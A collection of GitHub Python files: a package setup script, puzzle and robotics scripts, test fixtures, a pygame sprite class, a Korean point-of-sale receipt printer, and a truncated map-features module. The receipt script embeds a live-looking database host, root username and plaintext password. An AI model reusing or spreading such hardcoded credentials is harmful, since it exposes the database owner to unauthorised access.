+{"seq_id":"34073036518","text":"__author__ = 'Hamilton Kibbe '\n__version__ = '1.0'\n\n\n\n\nMETADATA = {\n 'name': 'pyableton',\n 'version': __version__,\n 'url': 'https://github.com/hamiltonkibbe/PyAbleton',\n 'packages': ['pyableton'],\n 'package_data': {'presets': ['presets/res/*']},\n 'author': 'Hamilton Kibbe',\n 'author_email': 'ham@hamiltonkib.be',\n 'description': 'A library for creating/editing Ableton Live presets',\n 'license': 'MIT License'\n}\n\nSETUPTOOLS_METADATA = {\n 'install_requires':['setuptools','bs4'],\n 'include_package_data': True\n}\n\ndef install():\n \"\"\" Install using setuptools, fallback to distutils\n \"\"\"\n try:\n from setuptools import setup\n METADATA.update(SETUPTOOLS_METADATA)\n setup(**METADATA)\n except ImportError:\n from sys import stderr\n stderr.write('Could not import setuptools, using distutils')\n stderr.write('NOTE: You will need to install dependencies manualy')\n from distutils.core import setup\n setup(**METADATA)\n\nif __name__ == '__main__':\n install()\n\n","repo_name":"hamiltonkibbe/PyAbleton","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"36"}
+{"seq_id":"18962034242","text":"import os\nimport math\nimport string\n\ninput_file = open(\"input.txt\", \"r\")\n\ncounter = 0\n\nfor line in input_file:\n g1, g2 = line.strip().split(\",\")\n g1a, g1b = g1.split(\"-\")\n g2a, g2b = g2.split(\"-\")\n s1 = set(range(int(g1a), int(g1b) + 1))\n s2 = set(range(int(g2a), int(g2b) + 1))\n\n if(s1.issubset(s2) or s2.issubset(s1)):\n counter += 1\n\n\nprint(counter)","repo_name":"rgvillanueva28/advent-of-code-2022","sub_path":"Day 4 - Camp Cleanup/Part 1.py","file_name":"Part 1.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"16679927011","text":"from src.modal.Stl import Stl\nfrom src.modal.Hsteel import Hsteel\nfrom src.algorithm.HsteelAnalysis import HsteelAnalysis\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport argparse\nimport csv\nimport os\nimport copy\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom stl import mesh\nimport stl, numpy\nimport time\n\ndef getAllPosAssociation(allPosAttr):\n posAttr = []\n\n for item in allPosAttr:\n for cThick in item[3]:\n for tbThick in item[4]:\n value = [item[0], item[1], item[2], cThick, tbThick]\n posAttr.append(value)\n\n return posAttr\n\ndef main(args):\n stlName = args.name\n stlPath = 'stl/' + stlName\n\n paintOrder = [\n [0, 1, 2],\n [3, 4, 5],\n [6],\n [7],\n ]\n\n # Stl Obj\n stlObj = Stl()\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n # Hsteel Attr Analysis\n hsteelAnalysis = HsteelAnalysis()\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n for p in hsteelConfig[:5]:\n print(p)\n\n # Hsteel Painting\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n hsteelPaint = Hsteel(ax)\n if len(hsteelConfig) > 0:\n print('Similar Result....')\n print(hsteelConfig[0]['config'])\n \n maxLength = 2000\n\n length = hsteelConfig[0]['config']['length']\n paintPoints = []\n # if length < maxLength: maxLength = length\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length, paintOrder[args.paintMode], args.paintLength)\n lengthTimes = int(length / maxLength)\n for time in range(0, lengthTimes):\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += maxLength * time\n paintPoints.append(p)\n if length % maxLength != 0:\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length % maxLength, paintOrder[args.paintMode], args.paintLength)\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += length - (length % maxLength)\n paintPoints.append(p)\n\n writeRouteToFile(paintPoints)\n plt.show()\n\ndef checkAllStlConfig():\n stlfiles = [f for f in listdir('stl') if isfile(join('stl', f))]\n \n # Init\n stlObj = Stl()\n hsteelAnalysis = HsteelAnalysis()\n for stlName in stlfiles:\n startTime = time.time()\n print('File ', stlName, ' is checking.....')\n stlPath = 'stl/' + stlName\n\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n\n if len(hsteelConfig) > 0:\n similarConfig = hsteelConfig[0]\n record = [\n stlName,\n similarConfig['sameNum'],\n similarConfig['distance'],\n similarConfig['config']['length'],\n similarConfig['config']['height'],\n similarConfig['config']['width'],\n similarConfig['config']['cThick'],\n similarConfig['config']['tbThick'],\n (time.time() - startTime)\n ]\n else:\n record = [stlName, -1, -1, -1, -1, -1, -1, -1, -1]\n writeRecordToFile(record)\n\n print('Finished...')\n\ndef writeRecordToFile(args):\n with open('./src/output/stl_record.csv', 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n\n data = [d for d in args]\n writer.writerow(data)\n\ndef writeRouteToFile(route):\n with open('./src/output/route.csv', 'a', newline='') as csvfile:\n csvfile.truncate(0)\n writer = csv.writer(csvfile)\n for i in route:\n if i[1] == -1: continue\n writer.writerow(i)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--name', '-n', 
default='H-900x300x14x28x2600.stl', type=str)\n parser.add_argument('--paintMode', '-m', default=4, type=int)\n parser.add_argument('--paintLength', '-l', default=125, type=int)\n parser.add_argument('--runall', '-r', default=False, type=bool)\n\n args = parser.parse_args()\n \n if args.runall: checkAllStlConfig()\n else: main(args)","repo_name":"discreet0303/h-steel-route-plan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"6260376001","text":"import pytest\nimport logging\nfrom .settings import CLIENT_CONF, DB_CONF\nfrom arango import ArangoClient\n\n\n#\n# Logging\n#\nLOG_LEVELS = {\n 'graphene-arango': logging.DEBUG,\n 'requests': logging.WARN,\n 'urllib3': logging.WARN,\n}\nlogging.basicConfig(level=LOG_LEVELS['graphene-arango'])\nfor litem in LOG_LEVELS.keys():\n logging.getLogger(litem).setLevel(LOG_LEVELS[litem])\n\n\ndef _test_db():\n cli = ArangoClient(**CLIENT_CONF)\n return cli.db(**DB_CONF)\n\n\n@pytest.fixture(scope=\"session\")\ndef test_db():\n # cli = ArangoClient(**CLIENT_CONF)\n yield _test_db()\n\n\n@pytest.fixture(scope=\"session\")\ndef cleanup(test_db):\n yield\n assert test_db.delete_collection('people')\n","repo_name":"riverfr0zen/graphene-arango","sub_path":"graphene_arango/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"71197249383","text":"#!/usr/bin/env python\n\nimport rospy\nimport sys\nfrom move_base_msgs.msg import *\nfrom geometry_msgs.msg import PoseStamped\n\n\ndef has_reached_goal(data):\n goal_status = data.status.text\n rospy.loginfo(goal_status)\n if goal_status == \"Goal reached.\":\n return True\n else:\n return False\n\n\ndef respond_move_base_result(x, y):\n msg_result = rospy.wait_for_message(\"/robot_0/move_base/result\", MoveBaseActionResult)\n if has_reached_goal(msg_result):\n rospy.loginfo(\"Point x: %f y: %f reached successfully\", x, y)\n sys.exit(0) # success\n else:\n rospy.loginfo(\"Did not reach point x: %f y: %f\", x, y)\n sys.exit(1) # fail\n\n\ndef respond_goal_success(data, expected_x, expected_y):\n x = float(data.pose.position.x)\n y = float(data.pose.position.y)\n rospy.loginfo('Checking goal status X: %f Y: %f', x, y)\n\n if expected_x - 0.1 <= x <= expected_x + 0.1 and expected_y - 0.1 <= y <= expected_y + 0.1:\n respond_move_base_result(x, y)\n else:\n rospy.loginfo(\"Waiting for a next goal\")\n\n\ndef oracle():\n rospy.init_node('oracle', anonymous=True)\n rospy.loginfo(\"Starting oracle ...\")\n rate = rospy.Rate(2)\n\n x, y = list(map(float, sys.argv[1:3]))\n\n while not rospy.is_shutdown():\n rospy.loginfo(\"Waiting for goal ...\")\n pose = rospy.wait_for_message(\"/robot_0/move_base_node/current_goal\", PoseStamped)\n respond_goal_success(pose, x, y)\n rate.sleep()\n\n\nif __name__ == '__main__':\n oracle()\n","repo_name":"ingmarliibert/testit-patrol-learn","sub_path":"testit_patrol_learn/testit_tests/tests/01/oracle/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"32808873641","text":"# !/usr/bin/env python\nfrom __future__ import print_function, division\n\nfrom time import time, sleep\nimport signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport rospy\nimport pyexotica as exo\nfrom pyexotica.publish_trajectory import *\n\nimport hsrb_exotica_python_script\n\ndef start_aico():\n do_plot = True\n traj_version = -1\n\n use_screenshot = False\n # ffmpeg -r 50 -f image2 -s 1920x1080 -i ./hsr_driveby_visualisation_%03d.png -vcodec libx264 -pix_fmt yuv420p ./output.mp4\n screenshot = lambda *args: None\n if use_screenshot:\n from jsk_rviz_plugins.srv import Screenshot, ScreenshotRequest, ScreenshotResponse\n rospy.wait_for_service('/rviz/screenshot')\n screenshot = rospy.ServiceProxy('/rviz/screenshot', Screenshot)\n\n exo.Setup.init_ros()\n # config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico_new.xml'\n config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico.xml'\n solver = exo.Setup.load_solver(config_name)\n problem = solver.get_problem()\n scene = problem.get_scene()\n kt = scene.get_kinematic_tree()\n joint_limits = problem.get_scene().get_kinematic_tree().get_joint_limits()\n\n # Set target for soda can\n scene.attach_object(\"SodaCan\", \"TargetObject\")\n #scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06+0.04]))\n #added offset to the y coordinate since planning and simulation grasp objects have different geometry.\n # bottle on right hand side\n # \n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n # bottle on left hand side\n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n\n # Move robot to start state\n x_start = problem.start_state\n x_start[0] = 0\n x_start[1] = 0\n x_start[2]= 0\n # x_start[2] = -np.pi/2.\n problem.start_state = x_start\n scene.set_model_state(problem.start_state)\n #scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': -1.})\n #set to move to go, assuming robot is already moving\n # \n # scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': -np.pi/2})\n scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': 0})\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n q_start = np.clip(q_start, joint_limits[:,0], joint_limits[:,1])\n problem.update(q_start, 0)\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n if np.any(q_start < joint_limits[:,0]) or np.any(q_start > joint_limits[:,1]):\n raise RuntimeError(\"Start state exceeds joint limits!\")\n\n mug_location = scene.fk('SodaCan', exo.KDLFrame(), '', exo.KDLFrame()).get_translation_and_rpy()\n\n # t_grasp_begin = 3.5 #4.2\n t_grasp_begin = 4.5\n t_grasp_duration = 0.5\n T_grasp_begin = int(t_grasp_begin / problem.tau)\n T_grasp_end = int((t_grasp_begin + t_grasp_duration) / problem.tau)\n\n # The target position needs to be reached during the grasping period\n 
problem.set_rho('Position', 0, 0)\n for t in range(T_grasp_begin, T_grasp_end):\n problem.set_rho('Position', 1e4, t)\n problem.set_goal('Position', mug_location[:3], t)\n\n # The HSR has a poor reachability, so we deactivate the base tracking here\n # problem.set_rho('BasePosition', 0, t)\n\n # Height above the table before and after grasp\n problem.set_rho('LiftOffTable', 1e2, T_grasp_begin - 20)\n # problem.set_rho('LiftOffTable', 1e3, T_grasp_end + 5)\n # problem.set_rho('LiftOffTable', 1e4, T_grasp_end + 10)\n problem.set_rho('LiftOffTable', 1e2, T_grasp_end + 20)\n\n\n # The axis needs to be fixed from the beginning of the grasp to the end of the motion\n for t in range(T_grasp_begin, problem.T):\n #problem.set_rho('AxisAlignment', 1e4, t)\n problem.set_rho('AxisAlignment', 1e2, t)\n\n problem.set_rho('BaseOrientation', 1e2, -1)\n\n # Initial trajectory = zero motion\n zero_motion = np.zeros((problem.T,problem.N))\n for t in range(problem.T):\n zero_motion[t,:] = q_start\n problem.initial_trajectory = zero_motion\n\n solution = solver.solve()\n print(\"Solved in\", solver.get_planning_time(), \"final cost\", problem.get_cost_evolution()[1][-1])\n # '''\n # Show convergence plot\n fig = plt.figure(1)\n plt.plot(problem.get_cost_evolution()[0], problem.get_cost_evolution()[1])\n plt.yscale('log')\n plt.ylabel('Cost')\n plt.xlabel('Time (s)')\n plt.xlim(0,np.max(problem.get_cost_evolution()[0]))\n plt.title('Convergence')\n\n # Show cost breakdown\n fig = plt.figure(2)\n # '''\n if do_plot:\n costs = {}\n ct = 1.0 / problem.tau / problem.T\n for t in range(problem.T):\n problem.update(solution[t,:],t)\n for cost_task in problem.cost.indexing:\n task = problem.cost.tasks[cost_task.id]\n task_name = task.name\n task_id = task.id\n costs[task_name] = np.zeros((problem.T,))\n # print(task_id, task_name, task, cost_task.start, cost_task.length, cost_task.startJ, cost_task.lengthJ)\n for t in range(problem.T):\n ydiff = problem.cost.ydiff[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n rho = problem.cost.S[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ,cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n cost = np.dot(np.dot(ydiff, rho), ydiff)\n costs[task_name][t] = ct * cost\n # '''\n if do_plot:\n costs['Task'] = np.zeros((problem.T,))\n costs['Transition'] = np.zeros((problem.T,))\n for t in range(problem.T):\n costs['Task'][t] = problem.get_scalar_task_cost(t)\n costs['Transition'][t] = problem.get_scalar_transition_cost(t)\n for cost in costs:\n plt.plot(costs[cost], label=cost)\n plt.legend()\n plt.xlim(0,problem.T)\n plt.title('Cost breakdown across trajectory per task')\n plt.show()\n plot(solution, labels=scene.get_controlled_joint_names())\n print(mug_location)\n return solution\n publish_trajectory(solution, problem.T*problem.tau, problem)\n# '''\n#midpoint = int(problem.T / 2)\n# midpoint = int((t_grasp_begin + t_grasp_duration)/problem.tau)\n# Add a custom publish_trajectory to support attaching the Coke can...\ndef publish_trajectory(traj, T, problem, once=False):\n if len(traj) == 0:\n print(\"Trajectory has zero elements\")\n raise\n signal.signal(signal.SIGINT, sig_int_handler)\n print('Playing back trajectory ' + str(T) + 's')\n dt = float(T) / float(len(traj))\n t = 0\n grasp_times = [t_grasp_begin, t_grasp_duration]\n return(solution)\n # print(\"saving trajectory\")\n # np.save('example_trajectory_t'+str(traj_version),solution)\n # hsrb_exotica_python_script.send_trajectory(solution, grasp_times, dt)\n # while True:\n # try:\n # publish_pose(traj[t], 
problem, float(t) * dt)\n # sleep(dt)\n\n # # Create screenshot if desired\n # if use_screenshot:\n # screenshot('/tmp/hsr_driveby_visualisation_{:03d}.png'.format(t))\n # sleep(0.1)\n # if t == len(traj) - 1:\n # print(\"Screenshots created, exiting.\")\n # break\n\n # if t >= len(traj) - 1 and once:\n # return\n # t = (t + 1) % len(traj)\n # if t == midpoint:\n # scene.attach_object(\"SodaCan\", \"hand_palm_link\")\n # elif t == 0:\n # scene.attach_object_local(\"SodaCan\", \"\", mug_location)\n # except KeyboardInterrupt:\n # return False\n#print(np.r_[mug_location[:3],3,4,5])\n#print(problem)\n#print(type(problem))\n#print(problem.start_state)\n","repo_name":"rshi159/hsr_driveby_full","sub_path":"scripts/rob_stuff/hsr_meeting_table_aico_whole.py","file_name":"hsr_meeting_table_aico_whole.py","file_ext":"py","file_size_in_byte":8435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"13240955694","text":"# pos project\n# Invoice maker\n\nimport pymysql\nimport time, datetime\n\nconn = pymysql.connect(host='45.119.147.76', user='root', password='201400867', db='hufPOS', charset='utf8')\ncurs = conn.cursor()\n\nclass Payinfo:\n def getdata(self):\n curs.execute(\"\"\"SELECT * FROM t_payinfo \"\"\")\n conn.commit()\n all_table = curs.fetchall()\n return all_table\n\n def search_obj(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT * FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_pmenu(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT Pmenu FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_mns(self, MNcode):\n try:\n curs.execute(\"\"\"SELECT MNname, MNprice FROM t_product WHERE MNcode = %s\"\"\", MNcode)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\ninvo_notdone = True\n\nwhile invo_notdone:\n this_member = Payinfo()\n show_table = this_member.getdata()\n print(show_table)\n print('영수증을 검색하시겠습니까? Y or N')\n\n command = input('type user command: ')\n\n if command == 'y' or command == 'Y': # 2) find payinfo\n Pnumb = input('검색하고자 하는 주문번호를 입력하세요:')\n search_result = str(this_member.search_obj(Pnumb))\n search_result = search_result.strip('(,)')\n\n Pnumb = search_result.split(',')[0]\n\n ptime_slice = search_result.split('(')[1]\n ptime_list = ptime_slice.split('),')[0]\n ptime_list = ''.join(ptime_list)\n ptime_list_year = ''.join(ptime_list.split(',')[0])\n ptime_list_mon = ''.join(ptime_list.split(',')[1])\n ptime_list_day = ''.join(ptime_list.split(',')[2])\n ptime_list_hr = ''.join(ptime_list.split(',')[3])\n ptime_list_mn = ''.join(ptime_list.split(',')[4])\n Ptime = ptime_list_year+ ptime_list_mon + ptime_list_day + ptime_list_hr + ptime_list_mn\n\n pclass = ptime_slice.split('),')[1]\n pclass_list = pclass.strip(''' ',',\"' ''')\n if pclass_list.count('카드'):\n Pclass_card = pclass_list.split(',')[0]\n P_card = int(Pclass_card.split(':')[1])\n else:\n P_card = 0\n if pclass_list.count('현금'):\n if P_card != 0:\n Pclass_cash = pclass_list.split(',')[1]\n else:\n Pclass_cash = pclass_list.split(',')[0]\n P_cash = int(Pclass_cash.split(':')[1])\n else:\n P_cash = 0\n pay_total = P_card + P_cash\n tax = int(pay_total*0.1)\n ohne_zoll = pay_total - tax\n\n pmenu_ls = str(this_member.get_pmenu(Pnumb))\n pmenu_ls = pmenu_ls.strip('((\"\",),)')\n print(pmenu_ls)\n '''mns = pmenu_ls.split(',')\n for idx, val in enumerate(mns):\n if idx % 2 == 1:\n qt = []\n qt.append(val)\n else:\n mn = []\n val = val.strip(\"''\")\n mn.append(val)\n print(qt, mn)'''\n\n #get_mns()\n #pmenu_qt = pmenu_mn.split(',')[1]\n #print(pmenu_qt)\n '''상품명과 단가는 t_product에서 가져오고 수량은 payinfo에서 금액은 단가*수량\n 상품명 찾기:\n pmenu 리스트 각 요소의 앞쪽 두글자 앞에 M 을 붙여서 t_product 테이블에 검색 쿼리를 보내고\n 받아온 정보를 이름, 단가로 변수별로 나눠서 저장한다.\n 리스트 각 요소 , 뒤 숫자가 수량으로 저장되면 된다.\n 금액은 단가 * 수량\n 리스트로 만들어서 상품명 단가 수량 금액 \\n \n 문자열로 만들려면 마지막에 ''.join()'''\n\n print(\"\"\"\" \n 영\t \t 수\t\t 증\n \t동네카페 외대 본점\n인터넷:www.dongne-cafe.onilne\n주소: 서울시 동대문구 이문로 107\n사업자: 201-81-20323 대표: dmkim\nTEL: 02-2173-2216\tFAX: 02-2173-0114\n주문시간:\"\"\", Ptime, \"\"\"\n포스No:1\t담당자:카페4조\t 주문번호: \"\"\", Pnumb, \"\"\"\n--------------------------------------------\n상품명\t\t 단가 
수량    금액\n--------------------------------------------\n\"\"\", pmenu_ls, \"\"\"\n\n--------------------------------------------\n카드계\t\t\t\t\t\t   \"\"\", P_card, \"\"\"\n현금계\t\t\t\t\t  \"\"\", P_cash, \"\"\"\n총판매계\t\t\t   \"\"\", pay_total, \"\"\" \n--------------------------------------------\n과세상품금액\t\t\t\t  \"\"\", ohne_zoll, \"\"\" \n부가가치세\t\t\t\t  \"\"\", tax, \"\"\" \n--------------------------------------------\n\tVielen Dank! Wiedersehen!\n\t\n\"\"\")\n\n    else:\n        print('영수증 검색을 취소했습니다.')\n        invo_notdone = False","repo_name":"Tieo/hufPOS_module","sub_path":"InvoiceMaker.py","file_name":"InvoiceMaker.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"23897603203","text":"import subprocess\n\nimport ctw.c_lower_bound as clb\nimport ctw.c_upper_bound as cb\nimport tw_utils\nimport sys\nfrom ctw import c_sv as svc\nimport sys\nfrom pysat.solvers import Glucose3\n\n\ndef solve_c(g, c_vertices, tub, c_value):\n c_lb = clb.c_lower_bound(g, c_vertices)\n print(f\"C lower bound {c_lb}\")\n val = c_value - 1\n ordering = None\n\n while c_lb <= val < c_value:\n print(f\"\\nLooking for decomposition of width C: {val}\")\n\n enc = svc.CTwEncoding(c_vertices, val, g)\n enc.encode()\n enc.encode_card(tub)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n val = knownc - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n val += 1\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, ordering\n\n return val, tub, ordering\n\n\ndef solve(g, c_vertices, tub=None):\n if len(c_vertices) == 0:\n return -1, None\n print(f\"Graph has {len(g.nodes)} nodes, {len(g.edges)} edges and {len(c_vertices)} c-vertices\")\n\n tub2, c_val, ordering = cb.min_c(g, c_vertices)\n if tub is None or tub2 < tub:\n tub = tub2\n\n tub2, val, ordering2 = solve_c(g, c_vertices, tub, c_val)\n if ordering2 is not None:\n c_val = val\n tub = tub2\n ordering = ordering2\n\n print(f\"Upper bound C: {c_val}, tree width {tub}\")\n sys.stdout.flush()\n\n # For c-treewidth we have to find the optimal c-value\n tlb = 1\n cval = tub-1\n knownc = c_val\n\n while tlb <= cval < tub:\n print(f\"\\nLooking for decomposition of size {cval}, C: {c_val}\")\n enc = svc.CTwEncoding(c_vertices, c_val, g)\n enc.encode()\n enc.encode_card(cval)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n cval = tub - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n cval += 1\n tlb = cval\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, ordering\n","repo_name":"ASchidler/tw-sv","sub_path":"ctw/solve_ctw.py","file_name":"solve_ctw.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"33596664415","text":"import pygame\nimport time\npygame.init()\ndisplay_width = 900\ndisplay_height = 600\ngameDisplay = pygame.display.set_mode((display_width, display_height))\n\nclass Player:\n\n\tdef __init__(self, position, imglist, jumpsprite, fallsprite):\n\t\tself.xpos = position[0]\n\t\tself.ypos = position[1]\n\t\tself.imglist = imglist\n\t\tself.jumpsprite = jumpsprite\n\t\tself.fallsprite = fallsprite\n\t\tself.stillsprite = imglist[8]\n\t\tself.imgtrack = 0\n\t\tself.xvel = 0\n\t\tself.yvel = 0\n\t\tself.maxvel = 5\n\t\tself.flip = False\n\t\tself.jumping = False\n\t\tself.falling = False\n\t\tself.still = True\n\n\tdef place(self, posx, posy):\n\t\tif not self.jumping and not self.falling and not self.still:\n\t\t\tif not self.flip:\n\t\t\t\tgameDisplay.blit(self.imglist[self.imgtrack], (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\t\telse:\n\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.imglist[self.imgtrack], True, False), (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\telse:\n\t\t\tif self.still:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.stillsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.stillsprite, True, False), (posx, posy))\n\t\t\telif self.jumping:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.jumpsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.jumpsprite, True, False), (posx, posy))\n\t\t\telif self.falling:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.fallsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.fallsprite, True, False), (posx, posy))","repo_name":"andychau/Shooter","sub_path":"PlayerClass.py","file_name":"PlayerClass.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"25169179486","text":"\"\"\"This module is used for computing map features for motion forecasting baselines.\"\"\"\n\nfrom typing import Any, Dict, List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import LineString, Point, Polygon\nfrom shapely.ops import cascaded_union\n\nfrom argoverse.map_representation.map_api import ArgoverseMap\nfrom argoverse.utils.centerline_utils import (\n get_nt_distance,\n remove_overlapping_lane_seq,\n)\nfrom argoverse.utils.mpl_plotting_utils import visualize_centerline\nfrom utils.baseline_config import (\n _MANHATTAN_THRESHOLD,\n _DFS_THRESHOLD_FRONT_SCALE,\n _DFS_THRESHOLD_BACK_SCALE,\n _MAX_SEARCH_RADIUS_CENTERLINES,\n _MAX_CENTERLINE_CANDIDATES_TEST,\n)\n\n\nclass MapFeaturesUtils:\n \"\"\"Utils for computation of map-based features.\"\"\"\n def __init__(self):\n \"\"\"Initialize class.\"\"\"\n self._MANHATTAN_THRESHOLD = _MANHATTAN_THRESHOLD\n self._DFS_THRESHOLD_FRONT_SCALE = _DFS_THRESHOLD_FRONT_SCALE\n self._DFS_THRESHOLD_BACK_SCALE = _DFS_THRESHOLD_BACK_SCALE\n self._MAX_SEARCH_RADIUS_CENTERLINES = _MAX_SEARCH_RADIUS_CENTERLINES\n self._MAX_CENTERLINE_CANDIDATES_TEST = _MAX_CENTERLINE_CANDIDATES_TEST\n\n def get_point_in_polygon_score(self, lane_seq: List[int],\n xy_seq: np.ndarray, city_name: str,\n avm: ArgoverseMap) -> int:\n \"\"\"Get the number of coordinates that lie insde the lane seq polygon.\n\n Args:\n lane_seq: Sequence of lane ids\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n point_in_polygon_score: Number of coordinates in the trajectory that lie within the lane sequence\n\n \"\"\"\n lane_seq_polygon = cascaded_union([\n Polygon(avm.get_lane_segment_polygon(lane, city_name)).buffer(0)\n for lane in lane_seq\n ])\n point_in_polygon_score = 0\n for xy in xy_seq:\n point_in_polygon_score += lane_seq_polygon.contains(Point(xy))\n return point_in_polygon_score\n\n def sort_lanes_based_on_point_in_polygon_score(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n ) -> List[List[int]]:\n \"\"\"Filter lane_seqs based on the number of coordinates inside the bounding 